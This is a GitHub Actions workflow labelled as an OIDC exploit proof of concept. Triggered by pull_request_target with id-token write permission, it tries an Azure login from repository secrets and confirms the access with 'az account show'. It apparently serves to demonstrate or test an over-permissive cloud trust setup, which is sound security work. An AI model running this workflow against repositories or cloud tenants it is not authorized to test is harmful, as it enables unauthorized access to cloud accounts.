name: PoC - OIDC Exploit

on:
  pull_request_target:

permissions:
  id-token: write
  contents: read

jobs:
  exploit:
    runs-on: ubuntu-latest
    steps:
      - name: Show repo context
        run: |
          echo "Actor: $GITHUB_ACTOR"
          echo "Event name: $GITHUB_EVENT_NAME"

      - name: Try Azure login
        uses: azure/login@v2
        with:
          client-id: ${{ secrets.AZURE_CLIENT_ID }}
          tenant-id: ${{ secrets.AZURE_TENANT_ID }}
          subscription-id: ${{ secrets.AZURE_SUBSCRIPTION_ID }}

      - name: Confirm login
        run: az account show
